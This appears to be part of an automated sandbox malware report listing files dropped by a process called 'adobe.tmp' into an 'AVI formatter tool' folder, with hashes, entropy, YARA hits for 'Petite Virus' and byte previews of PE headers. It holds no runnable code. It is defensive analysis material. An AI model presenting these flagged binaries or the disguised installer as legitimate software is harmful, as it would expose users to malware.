                                                                                                                                                        Entropy (8bit):6.063363187934607
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                                                                                        MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                                                                                        SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                                                                                        SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                                                                                        SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-2NPHT.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):512014
                                                                                                                                                        Entropy (8bit):6.566561154468342
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                                                                                        MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                                                                                        SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                                                                                        SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                                                                                        SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-5EUCF.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):227328
                                                                                                                                                        Entropy (8bit):6.641153481093122
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                                                                                                        MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                                                                                                        SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                                                                                                        SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                                                                                                        SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-5PBSD.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):258560
                                                                                                                                                        Entropy (8bit):6.491223412910377
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                                                                                                        MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                                                                                                        SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                                                                                                        SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                                                                                                        SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-62TD5.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):115712
                                                                                                                                                        Entropy (8bit):6.401537154757194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                                                                                        MD5:840D631DA54C308B23590AD6366EBA77
                                                                                                                                                        SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                                                                                        SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                                                                                        SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-6BR28.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):43520
                                                                                                                                                        Entropy (8bit):6.232860260916194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                                                                                                        MD5:B162992412E08888456AE13BA8BD3D90
                                                                                                                                                        SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                                                                                                        SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                                                                                                        SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-7MMUT.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):112640
                                                                                                                                                        Entropy (8bit):6.540227486061059
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                                                                                        MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                                                                                        SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                                                                                        SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                                                                                        SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-B5I6T.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):13838
                                                                                                                                                        Entropy (8bit):5.173769974589746
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                                                                                        MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                                                                                        SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                                                                                        SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                                                                                        SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-B8D2L.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):123406
                                                                                                                                                        Entropy (8bit):6.263889638223575
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                                                                                        MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                                                                                        SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                                                                                                        SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                                                                                        SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-CHQ62.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):34392
                                                                                                                                                        Entropy (8bit):7.81689943223162
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                                                                                                        MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                                                                                                        SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                                                                                                        SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                                                                                                        SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-DGTCL.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):15374
                                                                                                                                                        Entropy (8bit):5.192037544202194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                                                                                        MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                                                                                        SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                                                                                        SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                                                                                        SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):68876
                                                                                                                                                        Entropy (8bit):7.922125376804506
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                                                                                                        MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                                                                                                        SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                                                                                                        SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                                                                                                        SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Yara Hits:
                                                                                                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmp, Author: Joe Security
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/*.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c.*.=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):18966
                                                                                                                                                        Entropy (8bit):7.620111275837424
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                                                                                                        MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                                                                                                        SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                                                                                                        SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                                                                                                        SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                                                                                                        Malicious:true
                                                                                                                                                        Yara Hits:
                                                                                                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmp, Author: Joe Security
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G867L.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5960
                                                                                                                                                        Entropy (8bit):5.956401374574174
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                                                                                                        MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                                                                                                        SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                                                                                                        SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                                                                                                        SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G9QV0.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):294926
                                                                                                                                                        Entropy (8bit):6.191604766067493
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                                                                                        MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                                                                                        SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                                                                                        SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                                                                                        SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-GCKCR.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26526
                                                                                                                                                        Entropy (8bit):4.600837395607617
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                                                                                                        MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                                                                                                        SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                                                                                                        SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                                                                                                        SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-GDO6P.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):126478
                                                                                                                                                        Entropy (8bit):6.268811819718352
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                                                                                                        MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                                                                                                        SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                                                                                                        SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                                                                                                        SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-GV1D3.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):394752
                                                                                                                                                        Entropy (8bit):6.662070316214798
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                                                                                                        MD5:A4123DE65270C91849FFEB8515A864C4
